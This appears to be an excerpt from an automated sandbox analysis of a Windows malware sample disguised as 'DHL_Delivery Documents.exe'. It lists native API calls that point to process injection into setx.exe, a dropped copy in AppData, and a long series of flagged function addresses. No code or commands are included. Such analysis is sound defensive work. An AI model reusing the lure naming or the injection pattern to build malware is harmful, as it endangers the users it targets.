Source: 19.0.OoIHIwIlaOHZFTFWeSHYCjEJ.exe.280cd08.1.raw.unpack, BufferingPage.cs Long String: Length: 150953
Source: 19.2.OoIHIwIlaOHZFTFWeSHYCjEJ.exe.280cd08.1.raw.unpack, BufferingPage.cs Long String: Length: 150953
Initial sample is a PE file and has a suspicious name
Source: initial sample Static PE information: Filename: DHL_Delivery Documents.exe
Contains functionality to call native functions
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_0042B543 NtClose, 8_2_0042B543
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_0040A88F NtAllocateVirtualMemory, 8_2_0040A88F
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C52B60 NtClose,LdrInitializeThunk, 8_2_01C52B60
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C52DF0 NtQuerySystemInformation,LdrInitializeThunk, 8_2_01C52DF0
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C52C70 NtFreeVirtualMemory,LdrInitializeThunk, 8_2_01C52C70
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C535C0 NtCreateMutant,LdrInitializeThunk, 8_2_01C535C0
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C54340 NtSetContextThread, 8_2_01C54340
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C54650 NtSuspendThread, 8_2_01C54650
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C52BE0 NtQueryValueKey, 8_2_01C52BE0
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C52BF0 NtAllocateVirtualMemory, 8_2_01C52BF0
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C52B80 NtQueryInformationFile, 8_2_01C52B80
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C52BA0 NtEnumerateValueKey, 8_2_01C52BA0
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C52AD0 NtReadFile, 8_2_01C52AD0
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C52AF0 NtWriteFile, 8_2_01C52AF0
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C52AB0 NtWaitForSingleObject, 8_2_01C52AB0
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C52DD0 NtDelayExecution, 8_2_01C52DD0
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C52DB0 NtEnumerateKey, 8_2_01C52DB0
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C52D00 NtSetInformationFile, 8_2_01C52D00
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C52D10 NtMapViewOfSection, 8_2_01C52D10
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C52D30 NtUnmapViewOfSection, 8_2_01C52D30
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C52CC0 NtQueryVirtualMemory, 8_2_01C52CC0
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C52CF0 NtOpenProcess, 8_2_01C52CF0
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C52CA0 NtQueryInformationToken, 8_2_01C52CA0
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C52C60 NtCreateKey, 8_2_01C52C60
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C52C00 NtQueryInformationProcess, 8_2_01C52C00
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C52FE0 NtCreateFile, 8_2_01C52FE0
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C52F90 NtProtectVirtualMemory, 8_2_01C52F90
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C52FA0 NtQuerySection, 8_2_01C52FA0
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C52FB0 NtResumeThread, 8_2_01C52FB0
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C52F60 NtCreateProcessEx, 8_2_01C52F60
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C52F30 NtCreateSection, 8_2_01C52F30
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C52EE0 NtQueueApcThread, 8_2_01C52EE0
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C52E80 NtReadVirtualMemory, 8_2_01C52E80
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C52EA0 NtAdjustPrivilegesToken, 8_2_01C52EA0
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C52E30 NtWriteVirtualMemory, 8_2_01C52E30
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C53090 NtSetValueKey, 8_2_01C53090
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C53010 NtOpenDirectoryObject, 8_2_01C53010
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C539B0 NtGetContextThread, 8_2_01C539B0
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C53D70 NtOpenThread, 8_2_01C53D70
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C53D10 NtOpenProcessToken, 8_2_01C53D10
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C54340 NtSetContextThread,LdrInitializeThunk, 18_2_02C54340
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C54650 NtSuspendThread,LdrInitializeThunk, 18_2_02C54650
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C52AD0 NtReadFile,LdrInitializeThunk, 18_2_02C52AD0
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C52AF0 NtWriteFile,LdrInitializeThunk, 18_2_02C52AF0
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C52BE0 NtQueryValueKey,LdrInitializeThunk, 18_2_02C52BE0
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C52BF0 NtAllocateVirtualMemory,LdrInitializeThunk, 18_2_02C52BF0
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C52BA0 NtEnumerateValueKey,LdrInitializeThunk, 18_2_02C52BA0
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C52B60 NtClose,LdrInitializeThunk, 18_2_02C52B60
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C52EE0 NtQueueApcThread,LdrInitializeThunk, 18_2_02C52EE0
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C52E80 NtReadVirtualMemory,LdrInitializeThunk, 18_2_02C52E80
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C52FE0 NtCreateFile,LdrInitializeThunk, 18_2_02C52FE0
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C52FB0 NtResumeThread,LdrInitializeThunk, 18_2_02C52FB0
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C52F30 NtCreateSection,LdrInitializeThunk, 18_2_02C52F30
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C52CA0 NtQueryInformationToken,LdrInitializeThunk, 18_2_02C52CA0
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C52C60 NtCreateKey,LdrInitializeThunk, 18_2_02C52C60
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C52C70 NtFreeVirtualMemory,LdrInitializeThunk, 18_2_02C52C70
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C52DD0 NtDelayExecution,LdrInitializeThunk, 18_2_02C52DD0
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C52DF0 NtQuerySystemInformation,LdrInitializeThunk, 18_2_02C52DF0
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C52D10 NtMapViewOfSection,LdrInitializeThunk, 18_2_02C52D10
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C52D30 NtUnmapViewOfSection,LdrInitializeThunk, 18_2_02C52D30
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C535C0 NtCreateMutant,LdrInitializeThunk, 18_2_02C535C0
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C539B0 NtGetContextThread,LdrInitializeThunk, 18_2_02C539B0
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C52AB0 NtWaitForSingleObject, 18_2_02C52AB0
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C52B80 NtQueryInformationFile, 18_2_02C52B80
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C52EA0 NtAdjustPrivilegesToken, 18_2_02C52EA0
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C52E30 NtWriteVirtualMemory, 18_2_02C52E30
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C52F90 NtProtectVirtualMemory, 18_2_02C52F90
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C52FA0 NtQuerySection, 18_2_02C52FA0
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C52F60 NtCreateProcessEx, 18_2_02C52F60
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C52CC0 NtQueryVirtualMemory, 18_2_02C52CC0
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C52CF0 NtOpenProcess, 18_2_02C52CF0
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C52C00 NtQueryInformationProcess, 18_2_02C52C00
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C52DB0 NtEnumerateKey, 18_2_02C52DB0
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C52D00 NtSetInformationFile, 18_2_02C52D00
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C53090 NtSetValueKey, 18_2_02C53090
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C53010 NtOpenDirectoryObject, 18_2_02C53010
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C53D70 NtOpenThread, 18_2_02C53D70
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C53D10 NtOpenProcessToken, 18_2_02C53D10
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_00438020 NtDeleteFile, 18_2_00438020
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_004380B0 NtClose, 18_2_004380B0
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_00438200 NtAllocateVirtualMemory, 18_2_00438200
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_00437DE0 NtCreateFile, 18_2_00437DE0
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_00437F40 NtReadFile, 18_2_00437F40
Detected potential crypto function
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 0_2_02C1D384 0_2_02C1D384
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_004100D3 8_2_004100D3
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_004010F0 8_2_004010F0
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_0042D973 8_2_0042D973
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_004169F1 8_2_004169F1
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_004169F3 8_2_004169F3
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_00402260 8_2_00402260
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_00401270 8_2_00401270
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_00403200 8_2_00403200
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_004102F3 8_2_004102F3
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_0040E373 8_2_0040E373
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_0040246D 8_2_0040246D
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_00402470 8_2_00402470
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_00424413 8_2_00424413
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_0040E54B 8_2_0040E54B
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_004026A0 8_2_004026A0
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CD81CC 8_2_01CD81CC
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CE01AA 8_2_01CE01AA
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CD41A2 8_2_01CD41A2
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CA8158 8_2_01CA8158
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C10100 8_2_01C10100
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CBA118 8_2_01CBA118
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CB2000 8_2_01CB2000
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CE03E6 8_2_01CE03E6
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C2E3F0 8_2_01C2E3F0
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CDA352 8_2_01CDA352
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CA02C0 8_2_01CA02C0
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CC0274 8_2_01CC0274
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CE0591 8_2_01CE0591
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C20535 8_2_01C20535
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CCE4F6 8_2_01CCE4F6
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CD2446 8_2_01CD2446
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CC4420 8_2_01CC4420
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C1C7C0 8_2_01C1C7C0
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C44750 8_2_01C44750
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C20770 8_2_01C20770
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C3C6E0 8_2_01C3C6E0
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C229A0 8_2_01C229A0
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CEA9A6 8_2_01CEA9A6
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C36962 8_2_01C36962
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C4E8F0 8_2_01C4E8F0
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C068B8 8_2_01C068B8
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C22840 8_2_01C22840
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C2A840 8_2_01C2A840
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CD6BD7 8_2_01CD6BD7
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CDAB40 8_2_01CDAB40
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C1EA80 8_2_01C1EA80
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C1ADE0 8_2_01C1ADE0
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C38DBF 8_2_01C38DBF
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C2AD00 8_2_01C2AD00
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CBCD1F 8_2_01CBCD1F
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C10CF2 8_2_01C10CF2
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CC0CB5 8_2_01CC0CB5
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C20C00 8_2_01C20C00
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C12FC8 8_2_01C12FC8
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C2CFE0 8_2_01C2CFE0
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C9EFA0 8_2_01C9EFA0
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C94F40 8_2_01C94F40
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C62F28 8_2_01C62F28
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C40F30 8_2_01C40F30
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CC2F30 8_2_01CC2F30
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CDEEDB 8_2_01CDEEDB
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C32E90 8_2_01C32E90
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CDCE93 8_2_01CDCE93
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C20E59 8_2_01C20E59
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CDEE26 8_2_01CDEE26
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C2B1B0 8_2_01C2B1B0
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CEB16B 8_2_01CEB16B
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C5516C 8_2_01C5516C
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C0F172 8_2_01C0F172
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CCF0CC 8_2_01CCF0CC
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C270C0 8_2_01C270C0
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CD70E9 8_2_01CD70E9
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CDF0E0 8_2_01CDF0E0
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C6739A 8_2_01C6739A
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C0D34C 8_2_01C0D34C
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CD132D 8_2_01CD132D
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C3B2C0 8_2_01C3B2C0
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CC12ED 8_2_01CC12ED
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C252A0 8_2_01C252A0
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CE95C3 8_2_01CE95C3
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CBD5B0 8_2_01CBD5B0
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CD7571 8_2_01CD7571
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C11460 8_2_01C11460
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CDF43F 8_2_01CDF43F
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CDF7B0 8_2_01CDF7B0
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CD16CC 8_2_01CD16CC
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C65630 8_2_01C65630
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C29950 8_2_01C29950
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C3B950 8_2_01C3B950
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CB5910 8_2_01CB5910
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C238E0 8_2_01C238E0
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C8D800 8_2_01C8D800
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C95BF0 8_2_01C95BF0
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C5DBF9 8_2_01C5DBF9
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C3FB80 8_2_01C3FB80
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CDFB76 8_2_01CDFB76
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CCDAC6 8_2_01CCDAC6
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C65AA0 8_2_01C65AA0
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CBDAAC 8_2_01CBDAAC
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CC1AA3 8_2_01CC1AA3
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CDFA49 8_2_01CDFA49
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CD7A46 8_2_01CD7A46
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C93A6C 8_2_01C93A6C
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C3FDC0 8_2_01C3FDC0
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C23D40 8_2_01C23D40
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CD1D5A 8_2_01CD1D5A
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CD7D73 8_2_01CD7D73
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CDFCF2 8_2_01CDFCF2
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C99C32 8_2_01C99C32
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C21F92 8_2_01C21F92
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01BE3FD5 8_2_01BE3FD5
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01BE3FD2 8_2_01BE3FD2
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CDFFB1 8_2_01CDFFB1
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01CDFF09 8_2_01CDFF09
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C29EB0 8_2_01C29EB0
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Code function: 9_2_0076D384 9_2_0076D384
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Code function: 9_2_04A16260 9_2_04A16260
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Code function: 9_2_04A1D3EB 9_2_04A1D3EB
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Code function: 9_2_04A1CF80 9_2_04A1CF80
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Code function: 9_2_04A10006 9_2_04A10006
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Code function: 9_2_04A10040 9_2_04A10040
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Code function: 9_2_04A16251 9_2_04A16251
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Code function: 9_2_04A1D363 9_2_04A1D363
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Code function: 9_2_04A1D378 9_2_04A1D378
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Code function: 9_2_04A1CF70 9_2_04A1CF70
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Code function: 13_2_015E0100 13_2_015E0100
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Code function: 13_2_01636000 13_2_01636000
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Code function: 13_2_016702C0 13_2_016702C0
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Code function: 13_2_015F0535 13_2_015F0535
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Code function: 13_2_015F0770 13_2_015F0770
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Code function: 13_2_01614750 13_2_01614750
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Code function: 13_2_015EC7C0 13_2_015EC7C0
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Code function: 13_2_0160C6E0 13_2_0160C6E0
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Code function: 13_2_01606962 13_2_01606962
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Code function: 13_2_015F29A0 13_2_015F29A0
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Code function: 13_2_015F2840 13_2_015F2840
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Code function: 13_2_015FA840 13_2_015FA840
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Code function: 13_2_0161E8F0 13_2_0161E8F0
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Code function: 13_2_015D68B8 13_2_015D68B8
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Code function: 13_2_01628890 13_2_01628890
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Code function: 13_2_015EEA80 13_2_015EEA80
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Code function: 13_2_015FED7A 13_2_015FED7A
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Code function: 13_2_015FAD00 13_2_015FAD00
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Code function: 13_2_015F8DC0 13_2_015F8DC0
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Code function: 13_2_015EADE0 13_2_015EADE0
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Code function: 13_2_01608DBF 13_2_01608DBF
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Code function: 13_2_015F0C00 13_2_015F0C00
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Code function: 13_2_015E0CF2 13_2_015E0CF2
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Code function: 13_2_01664F40 13_2_01664F40
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Code function: 13_2_01632F28 13_2_01632F28
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Code function: 13_2_01610F30 13_2_01610F30
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Code function: 13_2_015E2FC8 13_2_015E2FC8
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Code function: 13_2_0166EFA0 13_2_0166EFA0
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Code function: 13_2_015F0E59 13_2_015F0E59
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Code function: 13_2_01602E90 13_2_01602E90
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Code function: 13_2_0162516C 13_2_0162516C
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Code function: 13_2_015DF172 13_2_015DF172
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Code function: 13_2_015FB1B0 13_2_015FB1B0
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Code function: 13_2_015DD34C 13_2_015DD34C
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Code function: 13_2_015F33F3 13_2_015F33F3
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Code function: 13_2_0160D2F0 13_2_0160D2F0
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Code function: 13_2_0160B2C0 13_2_0160B2C0
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Code function: 13_2_015F52A0 13_2_015F52A0
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Code function: 13_2_015E1460 13_2_015E1460
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Code function: 13_2_016374E0 13_2_016374E0
